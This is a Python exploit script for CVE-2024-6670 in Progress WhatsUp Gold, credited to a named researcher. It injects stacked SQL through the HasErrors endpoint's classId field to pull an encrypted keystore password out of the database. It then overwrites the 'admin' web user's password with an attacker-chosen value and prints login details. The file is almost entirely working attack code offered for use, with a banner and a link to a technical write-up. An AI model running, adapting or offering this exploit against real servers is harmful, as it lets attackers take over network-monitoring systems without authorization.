""" Progress Software WhatsUp Gold HasErrors SQL Injection Authentication Bypass Vulnerability (CVE-2024-6670) Exploit By: Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam) Special Thanks to my dear friend Manish Kishan Tanwar @indishell1046 Technical details: https://summoning.team/blog/progress-whatsup-gold-sqli-cve-2024-6670/ """ banner = r""" _______ _ _ _______ _______ _____ __ _ _____ __ _ ______ _______ _______ _______ _______ |______ | | | | | | | | | | | \ | | | \ | | ____ | |______ |_____| | | | ______| |_____| | | | | | | |_____| | \_| __|__ | \_| |_____| . | |______ | | | | | (*) Progress Software WhatsUp Gold HasErrors SQL Injection Authentication Bypass Vulnerability (CVE-2024-6670) (*) Exploit by Sina Kheirkhah (@SinSinology) of SummoningTeam (@SummoningTeam), shoutout to @indishell1046 (*) Technical details: https://summoning.team/blog/progress-whatsup-gold-sqli-cve-2024-6670/ """ """""" import urllib3 urllib3.disable_warnings() import requests import argparse print(banner) parser = argparse.ArgumentParser() parser.add_argument('--target-url', '-t', dest='target_url', help="target url (e.g: https://192.168.1.1)", required=True) parser.add_argument('--newpassword', '-n', dest='newpassword', help="new password to set for the administrator", required=True) args = parser.parse_args() args.target_url = args.target_url.rstrip("/") def send_exploit(payload): # psssst, I left a ton of IoCs, use them wisely final_payload = f"DF215E10-8BD4-4401-B2DC-99BB03135F2E';{payload};--" _json = {"deviceId":"22222","classId":final_payload,"range":"1","n":"1","start":"3","end":"4","businesdsHoursId":"5"} requests.post(f"{args.target_url}/NmConsole/Platform/PerformanceMonitorErrors/HasErrors", json=_json, verify=False) def retrieve_result(): res = requests.get(f"{args.target_url}/NmConsole/Platform/Filter/AlertCenterItemsReportThresholds", verify=False) if(res.status_code != 200): print("(!) exitting now because something wen't wrong when requesting the route /NmConsole/Platform/Filter/AlertCenterItemsReportThresholds") exit() for item in res.json(): if("psyduck" in item["DisplayName"]): return item['DisplayName'].replace('psyduck','') def convert_to_varbinary(input_str): byte_values = input_str.split(',') hex_values = [format(int(value), '02X') for value in byte_values] hex_string = ''.join(hex_values) varbinary_string = '0x' + hex_string return varbinary_string def encrypt_password_primitive(new_password): _json = {"KeyStorePassword":new_password, "TrustStorePassword":new_password} res = requests.post(f"{args.target_url}/NmConsole/WugSystemAppSettings/JMXSecurity", json=_json, verify=False) print("[*] Used remote primitive to encrypt our passowrd") print("[^_^] Starting the exploit...") encrypt_password_primitive(args.newpassword) target_user = 'admin' encrypted_password_exfil_payload = "UPDATE ProActiveAlert SET sAlertName='psyduck'+( SELECT sValue FROM GlobalSettings WHERE sName = '_GLOBAL_:JavaKeyStorePwd')" send_exploit(encrypted_password_exfil_payload) encrypted_password = retrieve_result() encrypted_password = convert_to_varbinary(encrypted_password) print(f"[*] encrypted password extracted -> " + encrypted_password) update_password_payload = f"UPDATE WebUser SET sPassword = {encrypted_password} where sUserName = '{target_user}'" send_exploit(update_password_payload) print(f"[+] Exploit finished, you can now login using the username -> {target_user} and password -> {args.newpassword}")